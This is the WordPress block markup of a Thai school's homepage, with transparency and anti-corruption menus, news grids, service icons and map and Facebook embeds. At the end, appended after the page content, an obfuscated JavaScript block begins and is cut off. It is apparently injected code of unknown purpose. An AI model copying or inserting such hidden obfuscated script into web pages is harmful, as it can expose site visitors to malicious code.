{\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 